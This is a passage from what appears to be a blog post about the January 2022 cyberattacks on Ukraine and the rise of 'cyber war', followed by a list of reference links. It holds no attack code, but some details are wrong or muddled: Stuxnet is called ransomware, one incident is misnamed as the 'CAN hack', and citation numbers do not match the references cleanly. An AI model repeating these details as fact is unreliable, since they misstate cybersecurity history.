This past weekend of cyberattacks is not a recent phenomenon. Instead, cyberattacks have been a defining characteristic of the tension between the two countries since the collapse of the Soviet Union (3). Shortly after the Soviet Union dissolved, both countries began using cyberattacks as weapons to further their confrontation (3). Experts are now using the term “cyber war” to describe similar computer-driven conflicts across the globe (5). In response to the events that transpired on Saturday, Bart Groothius, a member of the European Parliament said, “Cyber warfare doesn’t exist, it’s nonsense. (5)” Is he right, or is he simply refusing to accept that war as we understand it, is changing?

Let’s explore some more and then revisit his statement…

The Emergence of a New Weapon 

The sophistication of cyberattacks has evolved steadily over the last three decades and more recently, they have become a staple in all things criminal. They are increasingly being used as a means of perpetrating extreme violence, aggression, and even death. As political tensions have heightened across the globe since the early 2000s, cyberattacks have become the preferred means of various extremist groups, terror organizations, and other malevolent actors for perpetrating war, and inciting violence. The cyberattack in Ukraine is just one of many similar attacks that have occurred and is far from being the biggest attack to have occurred recently. Remember when we naively believed that the pandemic would be our biggest obstacle in 2021? Well, 2021 also witnessed some of the biggest cyberattacks in recent years, with millions being impacted (6). There was the Colonial Pipeline Attack, the Twitch Data Dump, the JBS Foods Hack, and the infamous CAN hack, that resulted in the data-captors being paid an astounding $40 million (6). These attacks only transpired in 2021, but lest we forget, the Stuxnet Worm Ransomware attack in 2010, which remains one of the most powerful ransomware attacks in history (6). If you remember 2010, then you must recall 2015, when hackers supported by the Chinese government breached the computer system of the Office of Personnel Management and leaked information of over 22 million federal employees (6).  

The lesson here? 

Cyberattacks will only become more destructive and nefarious with time. Things are only just beginning…

The Modern Battlefield 

Going forward, we must be vigilant and above all, remember not to underestimate these attacks simply because they are not physical. We are not living in an era in which war requires bloody battlefields, rifles, aircrafts, submarines, and other physical weapons. Instead, we are living in a world driven by technology, which can be used for as much violence, as it is used for impacting positive change and progress. Although the incident in Ukraine over the weekend was severe and must not be overlooked, we can anticipate many more attacks of a similar severity or otherwise, in the near future. The world is currently working towards refining and fully exploiting the power of quantum computing, autonomous machines, artificial intelligence, and cloud computing, all of which will no doubt play a significant role in cyber conflict (7,8). As our understanding of these technologies increases, it is inevitable that some will use these technologies for evil. Either way, we all need to understand and accept that cyberattacks are the future of war. Suit up, because we have never seen anything like this before. 

References

1. https://www.nytimes.com/2022/01/16/us/politics/microsoft-ukraine-cyberattack.html

2.https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

3. https://www.cnn.com/2022/01/16/europe/ukraine-malware-microsoft-warning-intl/index.html https://www.reuters.com/world/europe/microsoft-says-it-observed-destructive-malware-systems-belonging-several-ukraine-2022-01-16/

4. https://www.politico.eu/article/cyber-security-russia-ukraine-nato-europe/

5. https://ca.finance.yahoo.com/news/biggest-cyber-hacks-2021-105645115.html#:~:text=1.,largest%20oil%20and%20gas%20companies.

6. https://cove.army.gov.au/article/the-future-cyber-conflict

7. https://www.honeywell.com/us/en/news/2020/10/the-future-of-cybersecurity

8. https://www.politico.eu/article/cyber-security-russia-ukraine-nato-europe/

9. https://www.kcl.ac.uk/news/will-the-next-war-be-a-cyberwar

Hope you enjoyed this post! Feel free to comment below!